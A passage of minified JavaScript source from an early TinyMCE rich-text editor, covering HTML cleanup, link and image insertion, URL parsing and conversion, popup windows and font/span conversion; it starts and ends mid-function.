i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p> </p><hr /><p> </p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td> </td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s* \\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s* \\s*</p>','<p> </p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" />','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' ');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p> </p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('<>','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p> </p>"||chk=="<p> </p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ \t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p> <\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p> <\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' 